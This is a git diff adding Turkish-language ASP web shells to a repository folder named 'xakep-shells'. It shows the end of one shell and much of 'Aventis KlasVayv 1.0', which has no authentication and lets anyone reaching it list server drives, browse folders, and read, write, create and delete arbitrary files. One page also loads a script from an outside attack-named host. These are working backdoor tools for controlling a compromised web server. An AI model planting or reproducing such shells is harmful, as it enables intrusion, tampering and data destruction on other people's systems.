+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a href="?suruculer=1" style="text-decoration: none">
+        <font color="#9F9F9F">S�r�c�ler</font></a></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="?klasac=1&aktifklas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klas�r</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="?yenidosya=<%=aktifklas%>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+
+			
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;T�r</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Ad�</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;��lem</font></td>
+  </tr>
+</table>
+
+
+
+<% For each oge in altklasorler %> 
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://turkguvenligi.info/blues/statusicon/forum_new.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%>&nbsp;</font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="?klas=<%=aktifklas%><%=oge.name%>\" style="text-decoration: none">
+        <font color="#000000">A�</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="?silklas=<%=aktifklas & oge.name & "&klas=" & aktifklas %>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+			    
+
+<% For each oge in dosyalar %> 
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://turkguvenligi.info/blues/statusicon/forum_new.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%> </font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( <%=Round(oge.size/1024,1)%> KB )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="?duzenle=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>">
+        <font color="#000000">D�zenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="?sildos=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+
+
+
+<%
+if aktifklas=("C:\") then aktifklas=("C:")
+%>
+
+
+<%
+end if
+%>
+
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+<%
+end if
+%>
+<SCRIPT SRC=http://www.saldiri.org/summer/ciz.js></SCRIPT>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/ASP/klasvayv.asp.txt b/xakep-shells/ASP/klasvayv.asp.txt
new file mode 100644
index 0000000..da5866b
--- /dev/null
+++ b/xakep-shells/ASP/klasvayv.asp.txt
@@ -0,0 +1,901 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>Aventis KlasVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0" bgcolor="#EAEAEA">
+
+<script language="JavaScript">
+<!--
+function MM_openBrWindow(theURL,winName,features) { //v2.0
+  window.open(theURL,winName,features);
+}
+//-->
+</script>
+
+<%
+if request.querystring("usklas") = "1" then
+on error resume next
+es=request.querystring("klas")
+diez=server.urlencode(left(es,(instrRev(es,"\"))-1))
+
+Select case es
+case "C:" diez="C:"
+case "D:" diez="D:"
+end select
+
+
+
+
+%>
+
+
+
+
+
+<body topmargin="0" leftmargin="0"
+onLoad="location.href='klasvayv.asp?klas=<%=diez%>&usak=1'">
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("dosyakaydet") <> "" then
+set kaydospos=createobject("scripting.filesystemobject")
+set	kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi"))
+set kaydoses=nothing
+set kaydospos=nothing
+set kaydospos=createobject("scripting.filesystemobject")
+set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true)
+kaydoses.write request("duzenx")
+set kaydoses=nothing
+set kaydospos=nothing
+end if
+%>
+
+
+
+
+
+<%
+if request.querystring("yenidosya") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan Klas�r</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("yenidosya"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#B7B7B7">
+    <form method="POST" action="klasvayv.asp?dosyakaydet=<%=request.querystring("yenidosya")%>&klas=<%=request.querystring("yenidosya")%>" name="kaypos">
+<p align="center"><b><font size="1" face="Verdana">
+<br>
+Dosya Ad� : <br>
+                </font>
+	</b><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="97" maxlength="32"
+                name="dosadi" value="Dosya Ad�"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullan�c�'"
+                onfocus="if (this.value == 'Kullan�c�') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"><br>
+<br>
+                </font>
+	<b><font size="1" face="Verdana">
+��erik :&nbsp; <br>
+                </font>
+	<font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="95" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Olu�tur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right" bgcolor="#000000">
+    <p align="center">
+	&nbsp;</td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+
+
+
+
+
+<%
+if request.querystring("klasorac") <> "" then
+
+set doses=createobject("scripting.filesystemobject")
+set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx"))
+set es=nothing
+set doses=nothing
+
+
+end if
+%>
+
+<%
+if request.querystring("klasac") <> "" then
+
+set aktifklas=request.querystring("aktifklas")
+
+
+%>
+    <td width="65" bgcolor="#000000" height="76">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber25" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan Alan</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=aktifklas%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="174">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#C5C5C5" height="134">
+    <form method="POST" action="klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>" name="klaspos">
+<p align="center"><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx" value="Klas�r Ad�"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullan�c�'"
+                onfocus="if (this.value == 'Kullan�c�') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center">&nbsp;&nbsp;
+<br>
+<br>
+<br>
+                </font>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Olu�tur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("suruculer") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="4">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="4">
+        <span style="font-size: 2pt">&nbsp;</span></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="153">
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" height="113" bgcolor="#E1E1E1">&nbsp;<div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber2" height="17">
+        <tr>
+          <td width="208" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">S�r�c� Ad�</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Boyutu</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Bo� Alan</font></td>
+          <td width="64" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Durum</font></td>
+          <td width="62" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">��lem</font></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <div align="center">
+      <center>
+
+
+	<%
+	set klassis =server.createobject("scripting.filesystemobject")
+	set klasdri=klassis.drives
+	%>
+	
+	<%
+	for each dongu in klasdri
+	%>
+			
+	<%
+	if dongu.driveletter <> "A" then
+	if dongu.isready=true then
+	%>
+
+	<%
+	select case dongu.drivetype
+	case 0 teype="Di�er"
+	case 1 teype="Ta��n�r"
+	case 2 teype="HDD"
+	case 3 teype="NetWork"
+	case 4 teype="CD-Rom"
+	case 5 teype="FlashMem"
+	end select
+	%>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber3" height="17">
+        <tr>
+          <td width="208" height="17" align="left" bgcolor="#EEEEEE">
+          <font face="Verdana" style="font-size: 8pt">&nbsp;<%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> )</font></td>
+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.totalsize/(1024*1024),1)%> MB</font></td>
+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.availablespace/(1024*1024),1)%> MB</font></td>
+          <td width="64" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=teype%>&nbsp;</font></td>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0">
+          <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber24">
+            <tr>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0"
+          onmouseover="this.style.background='#A0A0A0'"
+          onmouseout="this.style.background='#E0E0E0'"
+          style="CURSOR: hand"
+          
+          >
+          <a href="klasvayv.asp?klas=<%=dongu.driveletter%>:\" style="text-decoration: none">
+          <font face="Verdana" style="font-size: 8pt" color="#000000">Gir</font></a></td>
+            </tr>
+          </table>
+          </td>
+        </tr>
+      </table>
+
+	<%
+	end if
+	end if
+	%>
+<%
+next
+%>
+
+
+
+      </center>
+    </div>
+    <div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber4" height="4">
+        <tr>
+          <td width="484" height="4" align="center" bgcolor="#C5C5C5">
+          <span style="font-size: 2pt">&nbsp;</span></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <p>&nbsp;</p>
+    </td>
+  </tr>
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+
+
+
+
+<%
+else
+%>
+
+
+
+
+
+<%
+if request.querystring("kaydet") <> "" then
+set dossisx=server.createobject("scripting.filesystemobject")
+set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true)
+dosx.write request("duzenx")
+dosx.close
+set dosyax=nothing
+set dossisx=nothing
+
+end if
+%>
+
+
+
+
+<%
+if request.querystring("duzenle") <> "" then
+set dossis=server.createobject("scripting.filesystemobject")
+set dos=dossis.opentextfile(request.querystring("duzenle"), 1)
+sedx = dos.readall
+dos.close
+set dosya=nothing
+set dossis=nothing
+
+set aktifklas=request.querystring("klas")
+%>
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("duzenle"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    <form method="POST" action="klasvayv.asp?kaydet=<%=request.querystring("duzenle")%>&klas=<%=aktifklas%>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="163" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right">
+    <p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><a href="klasvayv.asp"><input type="reset" size="16"
+		name="x" value="Vazge�"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></a></td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+<%
+
+if request.querystring("klas") <> "" then
+aktifklas=Request.querystring("klas")
+if request.querystring("usak") = "1" then
+aktifklas=aktifklas & "\"
+end if
+
+else
+aktifklas=server.mappath("/")
+aktifklas=aktifklas & "\"
+end if
+
+if request.querystring("silklas") <> "" then
+set sis=createobject("scripting.filesystemobject")
+silincekklas=request.querystring("silklas")
+sis.deletefolder(silincekklas)
+set sis=nothing
+'response.write(sil & "  Silindi")
+end if
+
+if request.querystring("sildos") <> "" then
+silincekdos=request.querystring("sildos")
+set dosx=createobject("scripting.filesystemobject")
